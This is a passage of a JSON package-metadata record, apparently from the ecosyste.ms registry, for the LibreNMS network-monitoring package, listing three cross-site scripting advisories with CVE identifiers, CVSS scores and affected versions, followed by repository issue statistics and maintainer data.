range":"\u003c= 21.11.0"}],"purl":null}],"related_packages_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS01dnI2LWhtNjgtNWo5cM0YwQ/related_packages","related_advisories":[]},{"uuid":"GSA_kwCzR0hTQS00Z3doLTJwcXgtZjVjY80Ywg","url":"https://github.com/advisories/GHSA-4gwh-2pqx-f5cc","title":"Cross-site Scripting in LibreNMS","description":"LibreNMS 21.11.0 is affected by is affected by a Cross Site Scripting (XSS) vulnerability in includes/html/common/alert-log.inc.php.","origin":"UNSPECIFIED","severity":"MODERATE","published_at":"2021-12-03T20:48:42.000Z","withdrawn_at":null,"classification":"GENERAL","cvss_score":6.1,"cvss_vector":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N","references":["https://nvd.nist.gov/vuln/detail/CVE-2021-44277","https://github.com/librenms/librenms/pull/13554","https://github.com/librenms/librenms/pull/13554/commits/fff7b45a7599f8f13a55250dc5f2b957f3394194","https://github.com/advisories/GHSA-4gwh-2pqx-f5cc"],"source_kind":"github","identifiers":["GHSA-4gwh-2pqx-f5cc","CVE-2021-44277"],"repository_url":"https://github.com/librenms/librenms","blast_radius":0.0,"created_at":"2022-12-21T16:12:41.490Z","updated_at":"2026-09-03T00:10:46.740Z","epss_percentage":0.00628,"epss_percentile":0.4763,"api_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS00Z3doLTJwcXgtZjVjY80Ywg","html_url":"https://advisories.ecosyste.ms/advisories/GSA_kwCzR0hTQS00Z3doLTJwcXgtZjVjY80Ywg","packages":[{"ecosystem":"packagist","package_name":"librenms/librenms","versions":[{"first_patched_version":null,"vulnerable_version_range":"\u003c= 21.11.0"}],"purl":null}],"related_packages_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS00Z3doLTJwcXgtZjVjY80Ywg/related_packages","related_advisories":[]},{"uuid":"GSA_kwCzR0hTQS00NnJ4LTZqZzktNGZoOM0W5w","url":"https://github.com/advisories/GHSA-46rx-6jg9-4fh8","title":"Cross-site Scripting in LibreNMS","description":"LibreNMS through 21.10.2 allows XSS via a widget title.","origin":"UNSPECIFIED","severity":"MODERATE","published_at":"2021-11-08T17:59:15.000Z","withdrawn_at":null,"classification":"GENERAL","cvss_score":6.1,"cvss_vector":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N","references":["https://nvd.nist.gov/vuln/detail/CVE-2021-43324","https://github.com/librenms/librenms/commit/99d2462b80435b91a35236639b909eebee432126","https://github.com/advisories/GHSA-46rx-6jg9-4fh8"],"source_kind":"github","identifiers":["GHSA-46rx-6jg9-4fh8","CVE-2021-43324"],"repository_url":"https://github.com/librenms/librenms","blast_radius":0.0,"created_at":"2022-12-21T16:12:43.800Z","updated_at":"2026-09-03T00:10:46.739Z","epss_percentage":0.00649,"epss_percentile":0.48622,"api_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS00NnJ4LTZqZzktNGZoOM0W5w","html_url":"https://advisories.ecosyste.ms/advisories/GSA_kwCzR0hTQS00NnJ4LTZqZzktNGZoOM0W5w","packages":[{"ecosystem":"packagist","package_name":"librenms/librenms","versions":[{"first_patched_version":"21.11.0","vulnerable_version_range":"\u003c= 21.10.2"}],"purl":null}],"related_packages_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS00NnJ4LTZqZzktNGZoOM0W5w/related_packages","related_advisories":[]},{"uuid":"GSA_kwCzR0hTQS0ycjJ3LWpyaDItcDRncs0Vqw","url":"https://github.com/advisories/GHSA-2r2w-jrh2-p4gr","title":"Cross-site Scripting in LibreNMS","description":"In LibreNMS \u003c 21.3.0, a stored XSS vulnerability was identified in the API Access page due to insufficient sanitization of the $api-\u003edescription variable. As a result, arbitrary Javascript code can get executed.","origin":"UNSPECIFIED","severity":"MODERATE","published_at":"2021-09-09T17:08:55.000Z","withdrawn_at":null,"classification":"GENERAL","cvss_score":5.4,"cvss_vector":"CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N","references":["https://nvd.nist.gov/vuln/detail/CVE-2021-31274","https://github.com/librenms/librenms/pull/12739","https://community.librenms.org/t/vulnerability-report-cross-site-scripting-xss-in-the-api-access-page/15431","https://github.com/librenms/librenms","https://github.com/advisories/GHSA-2r2w-jrh2-p4gr"],"source_kind":"github","identifiers":["GHSA-2r2w-jrh2-p4gr","CVE-2021-31274"],"repository_url":"https://github.com/librenms/librenms","blast_radius":0.0,"created_at":"2022-12-21T16:12:47.574Z","updated_at":"2026-09-03T00:10:46.739Z","epss_percentage":0.00778,"epss_percentile":0.52515,"api_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS0ycjJ3LWpyaDItcDRncs0Vqw","html_url":"https://advisories.ecosyste.ms/advisories/GSA_kwCzR0hTQS0ycjJ3LWpyaDItcDRncs0Vqw","packages":[{"ecosystem":"packagist","package_name":"librenms/librenms","versions":[{"first_patched_version":"21.3.0","vulnerable_version_range":"\u003c 21.3.0"}],"purl":null}],"related_packages_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS0ycjJ3LWpyaDItcDRncs0Vqw/related_packages","related_advisories":[]}],"docker_usage_url":"https://docker.ecosyste.ms/usage/packagist/librenms/librenms","docker_dependents_count":null,"docker_downloads_count":null,"usage_url":"https://repos.ecosyste.ms/usage/packagist/librenms/librenms","dependent_repositories_url":"https://repos.ecosyste.ms/api/v1/usage/packagist/librenms/librenms/dependencies","status":null,"funding_links":["https://opencollective.com/librenms"],"critical":null,"issue_metadata":{"last_synced_at":"2026-08-26T07:40:55.426Z","issues_count":656,"pull_requests_count":4477,"avg_time_to_close_issue":13977220.677345539,"avg_time_to_close_pull_request":2321468.3349564327,"issues_closed_count":437,"pull_requests_closed_count":3902,"pull_request_authors_count":498,"issue_authors_count":467,"avg_comments_per_issue":2.222560975609756,"avg_comments_per_pull_request":1.9084208175117265,"merged_pull_requests_count":3268,"bot_issues_count":0,"bot_pull_requests_count":90,"past_year_issues_count":38,"past_year_pull_requests_count":205,"past_year_avg_time_to_close_issue":1488882.4210526317,"past_year_avg_time_to_close_pull_request":762648.7685185185,"past_year_issues_closed_count":19,"past_year_pull_requests_closed_count":108,"past_year_pull_request_authors_count":84,"past_year_issue_authors_count":35,"past_year_avg_comments_per_issue":1.368421052631579,"past_year_avg_comments_per_pull_request":1.7707317073170732,"past_year_bot_issues_count":0,"past_year_bot_pull_requests_count":2,"past_year_merged_pull_requests_count":85,"issues_url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/repositories/librenms%2Flibrenms/issues","maintainers":[{"login":"murrant","count":1181,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/murrant"},{"login":"laf","count":305,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/laf"},{"login":"Jellyfrog","count":261,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Jellyfrog"},{"login":"electrocret","count":71,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/electrocret"},{"login":"SourceDoctor","count":19,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/SourceDoctor"},{"login":"f0o","count":6,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/f0o"},{"login":"kkrumm1","count":4,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/kkrumm1"},{"login":"peelman","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/peelman"},{"login":"nils-n","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/nils-n"},{"login":"crazy-max","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/crazy-max"},{"login":"leandrohstein","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/leandrohstein"},{"login":"lipchev","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/lipchev"},{"login":"macojaune","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/macojaune"},{"login":"steveonead","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/steveonead"},{"login":"Rosiak","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Rosiak"},{"login":"TimChen44","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/TimChen44"}],"active_maintainers":[{"login":"murrant","count":52,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/murrant"},{"login":"laf","count":11,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/laf"},{"login":"Jellyfrog","count":7,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Jellyfrog"},{"login":"electrocret","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/electrocret"},{"login":"SourceDoctor","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/SourceDoctor"}]},"versions_url":"https://packages.ecosyste.ms/api/v1/registries/packagist.org/packages/librenms%2Flibrenms/versions","version_numbers_url":"https://packages.ecosyste.ms/api/v1/registries/packagist.org/packages/librenms%2Flibrenms/version_numbers","latest_version_url":"https://packages.ecosyste.ms/api/v1/registries/packagist.org/packages/librenms%2Flibrenms/latest_version","dependent_packages_url":"https://packages.ecosyste.ms/api/v1/registries/packagist.org/packages/librenms%2Flibrenms/dependent_packages","related_packages_url":"https://packages.ecosyste.ms/api/v1/registries/packagist.org/packages/librenms%2Flibrenms/related_packages","codemeta_url":"https://packages.ecosyste.ms/api/v1/registries/packagist.org/packages/librenms%2Flibrenms/codemeta","maintainers":[{"uuid":"murrant","login":"murrant","name":null,"email":null,"url":null,"packages_count":5,"html_url":"https://packagist.org/users/murrant","role":null,"created_at":"2022-11-20T23:06:18.832Z","updated_at":"2022-11-20T23:06:18.832Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/packagist.org/maintainers/murrant/packages"}],"registry":{"name":"packagist.org","url":"https://packagist.org","ecosystem":"packagist","default":true,"packages_count":513423,"maintainers_count":143397,"namespaces_count":172247,"keywords_count":147330,"github":"packagist","metadata":{"funded_packages_count":30699},"icon_url":"https://github.com/packagist.png","created_at":"2022-04-04T15:19:23.222Z","updated_at":"2026-09-02T05:03:52.774Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/packagist.org/packages","maintainers_url":"https://packages.ecosyste.ms/api/v1/registries/packagist.org/maintainers","namespaces_url":"https://packages.ecosyste.ms/api/v1/registries/packagist.org/namespaces"}}]